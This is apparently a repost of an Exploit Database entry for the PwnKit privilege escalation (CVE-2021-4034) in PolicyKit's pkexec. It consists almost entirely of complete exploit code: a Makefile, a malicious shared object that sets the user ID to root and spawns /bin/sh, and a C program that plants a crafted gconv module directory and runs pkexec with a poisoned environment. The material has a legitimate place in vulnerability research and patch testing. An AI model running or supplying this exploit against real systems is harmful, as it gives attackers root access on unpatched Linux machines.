PolicyKit-1 0.105-31 – Privilege Escalation

• Exploit Database
• 39 阅读

• 作者： Lance Biggerstaff
  日期： 2022-01-27
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/50689/

• # Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
  # Exploit Author: Lance Biggerstaff
  # Original Author: ryaagard (https://github.com/ryaagard)
  # Date: 27-01-2022
  # Github Repo: https://github.com/ryaagard/CVE-2021-4034
  # References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
  
  # Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`
  
  ##### Makefile #####
  
  all:
  	gcc -shared -o evil.so -fPIC evil-so.c
  	gcc exploit.c -o exploit
  
  clean:
  	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
  
  #################
  
  ##### evil-so.c #####
  
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  
  void gconv() {}
  
  void gconv_init() {
  setuid(0);
  setgid(0);
  setgroups(0);
  
  execve("/bin/sh", NULL, NULL);
  }
  
  #################
  
  ##### exploit.c #####
  
  #include <stdio.h>
  #include <stdlib.h>
  
  #define BIN "/usr/bin/pkexec"
  #define DIR "evildir"
  #define EVILSO "evil"
  
  int main()
  {
  char *envp[] = {
  DIR,
  "PATH=GCONV_PATH=.",
  "SHELL=ryaagard",
  "CHARSET=ryaagard",
  NULL
  };
  char *argv[] = { NULL };
  
  system("mkdir GCONV_PATH=.");
  system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
  system("mkdir " DIR);
  system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
  system("cp " EVILSO ".so " DIR);
  
  execve(BIN, argv, envp);
  
  return 0;
  }
  
  #################